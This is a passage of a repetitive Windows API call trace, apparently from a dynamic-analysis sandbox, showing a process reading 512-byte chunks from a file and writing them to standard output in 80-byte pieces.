lpOverlapped=0x0 | out: lpBuffer=0x1aef48*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.300] GetFileType (hFile=0x4c) returned 0x1 [0133.300] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef98*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] GetFileType (hFile=0x4c) returned 0x1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aefe8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] GetFileType (hFile=0x4c) returned 0x1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] WriteFile (in: hFile=0x4c, lpBuffer=0x1af038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af038*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] GetFileType (hFile=0x4c) returned 0x1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] WriteFile (in: hFile=0x4c, lpBuffer=0x1af088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af088*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] GetFileType (hFile=0x4c) returned 0x1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: 
lpBuffer=0x1af0d8*, lpNumberOfBytesWritten=0x1ae0dc*=0x20, lpOverlapped=0x0) returned 1 [0133.301] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.301] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae0c8 | out: lpNewFilePointer=0x0) returned 1 [0133.301] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.301] ReadFile (in: hFile=0x54, lpBuffer=0x1aeef8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae0e8, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesRead=0x1ae0e8*=0x200, lpOverlapped=0x0) returned 1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] GetFileType (hFile=0x4c) returned 0x1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] GetFileType (hFile=0x4c) returned 0x1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeef8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] GetFileType (hFile=0x4c) returned 0x1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef48*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.301] GetFileType (hFile=0x4c) returned 0x1 [0133.301] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef98*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] GetFileType (hFile=0x4c) returned 0x1 [0133.302] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0133.302] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aefe8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] GetFileType (hFile=0x4c) returned 0x1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] WriteFile (in: hFile=0x4c, lpBuffer=0x1af038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af038*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] GetFileType (hFile=0x4c) returned 0x1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] WriteFile (in: hFile=0x4c, lpBuffer=0x1af088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af088*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] GetFileType (hFile=0x4c) returned 0x1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af0d8*, lpNumberOfBytesWritten=0x1ae0dc*=0x20, lpOverlapped=0x0) returned 1 [0133.302] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.302] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae0c8 | out: lpNewFilePointer=0x0) returned 1 [0133.302] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.302] ReadFile (in: hFile=0x54, lpBuffer=0x1aeef8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae0e8, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesRead=0x1ae0e8*=0x200, lpOverlapped=0x0) returned 1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] 
GetFileType (hFile=0x4c) returned 0x1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] GetFileType (hFile=0x4c) returned 0x1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeef8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] GetFileType (hFile=0x4c) returned 0x1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef48*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] GetFileType (hFile=0x4c) returned 0x1 [0133.302] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.302] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef98*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] GetFileType (hFile=0x4c) returned 0x1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aefe8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] GetFileType (hFile=0x4c) returned 0x1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] WriteFile (in: hFile=0x4c, lpBuffer=0x1af038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af038*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 
[0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] GetFileType (hFile=0x4c) returned 0x1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] WriteFile (in: hFile=0x4c, lpBuffer=0x1af088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af088*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] GetFileType (hFile=0x4c) returned 0x1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af0d8*, lpNumberOfBytesWritten=0x1ae0dc*=0x20, lpOverlapped=0x0) returned 1 [0133.303] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.303] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae0c8 | out: lpNewFilePointer=0x0) returned 1 [0133.303] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.303] ReadFile (in: hFile=0x54, lpBuffer=0x1aeef8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae0e8, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesRead=0x1ae0e8*=0x200, lpOverlapped=0x0) returned 1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] GetFileType (hFile=0x4c) returned 0x1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] GetFileType (hFile=0x4c) returned 0x1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeef8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] GetFileType (hFile=0x4c) returned 0x1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef48*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef48*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] GetFileType (hFile=0x4c) returned 0x1 [0133.303] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.303] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef98*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] GetFileType (hFile=0x4c) returned 0x1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aefe8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] GetFileType (hFile=0x4c) returned 0x1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] WriteFile (in: hFile=0x4c, lpBuffer=0x1af038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af038*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] GetFileType (hFile=0x4c) returned 0x1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] WriteFile (in: hFile=0x4c, lpBuffer=0x1af088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af088*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] GetFileType (hFile=0x4c) returned 0x1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0d8*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af0d8*, lpNumberOfBytesWritten=0x1ae0dc*=0x20, lpOverlapped=0x0) returned 1 [0133.304] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.304] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae0c8 | out: lpNewFilePointer=0x0) returned 1 [0133.304] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.304] ReadFile (in: hFile=0x54, lpBuffer=0x1aeef8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae0e8, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesRead=0x1ae0e8*=0x200, lpOverlapped=0x0) returned 1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] GetFileType (hFile=0x4c) returned 0x1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] GetFileType (hFile=0x4c) returned 0x1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeef8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] GetFileType (hFile=0x4c) returned 0x1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef48*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] GetFileType (hFile=0x4c) returned 0x1 [0133.304] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.304] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef98*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.305] GetFileType 
(hFile=0x4c) returned 0x1 [0133.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.305] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aefe8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.305] GetFileType (hFile=0x4c) returned 0x1 [0133.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.305] WriteFile (in: hFile=0x4c, lpBuffer=0x1af038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af038*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.305] GetFileType (hFile=0x4c) returned 0x1 [0133.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.305] WriteFile (in: hFile=0x4c, lpBuffer=0x1af088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af088*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.305] GetFileType (hFile=0x4c) returned 0x1 [0133.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.305] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af0d8*, lpNumberOfBytesWritten=0x1ae0dc*=0x20, lpOverlapped=0x0) returned 1 [0133.305] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.305] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae0c8 | out: lpNewFilePointer=0x0) returned 1 [0133.305] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.305] ReadFile (in: hFile=0x54, lpBuffer=0x1aeef8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae0e8, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesRead=0x1ae0e8*=0x200, lpOverlapped=0x0) returned 1 [0133.305] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0133.305] GetFileType (hFile=0x4c) returned 0x1 [0133.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.305] GetFileType (hFile=0x4c) returned 0x1 [0133.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.305] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeef8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.305] GetFileType (hFile=0x4c) returned 0x1 [0133.305] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.305] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef48*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] GetFileType (hFile=0x4c) returned 0x1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef98*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] GetFileType (hFile=0x4c) returned 0x1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aefe8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] GetFileType (hFile=0x4c) returned 0x1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] WriteFile (in: hFile=0x4c, lpBuffer=0x1af038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af038*, 
lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] GetFileType (hFile=0x4c) returned 0x1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] WriteFile (in: hFile=0x4c, lpBuffer=0x1af088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af088*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] GetFileType (hFile=0x4c) returned 0x1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af0d8*, lpNumberOfBytesWritten=0x1ae0dc*=0x20, lpOverlapped=0x0) returned 1 [0133.306] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.306] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae0c8 | out: lpNewFilePointer=0x0) returned 1 [0133.306] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.306] ReadFile (in: hFile=0x54, lpBuffer=0x1aeef8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae0e8, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesRead=0x1ae0e8*=0x200, lpOverlapped=0x0) returned 1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] GetFileType (hFile=0x4c) returned 0x1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] GetFileType (hFile=0x4c) returned 0x1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeef8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.306] GetFileType (hFile=0x4c) returned 0x1 [0133.306] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0133.306] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef48*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] GetFileType (hFile=0x4c) returned 0x1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef98*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] GetFileType (hFile=0x4c) returned 0x1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aefe8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] GetFileType (hFile=0x4c) returned 0x1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] WriteFile (in: hFile=0x4c, lpBuffer=0x1af038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af038*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] GetFileType (hFile=0x4c) returned 0x1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] WriteFile (in: hFile=0x4c, lpBuffer=0x1af088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af088*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] GetFileType (hFile=0x4c) returned 0x1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] WriteFile (in: hFile=0x4c, 
lpBuffer=0x1af0d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1af0d8*, lpNumberOfBytesWritten=0x1ae0dc*=0x20, lpOverlapped=0x0) returned 1 [0133.307] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.307] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae0c8 | out: lpNewFilePointer=0x0) returned 1 [0133.307] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.307] ReadFile (in: hFile=0x54, lpBuffer=0x1aeef8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae0e8, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesRead=0x1ae0e8*=0x200, lpOverlapped=0x0) returned 1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] GetFileType (hFile=0x4c) returned 0x1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] GetFileType (hFile=0x4c) returned 0x1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeef8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] GetFileType (hFile=0x4c) returned 0x1 [0133.307] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.307] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef48*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.308] GetFileType (hFile=0x4c) returned 0x1 [0133.308] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.308] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aef98*, lpNumberOfBytesWritten=0x1ae0dc*=0x50, lpOverlapped=0x0) returned 1 [0133.308] _get_osfhandle 
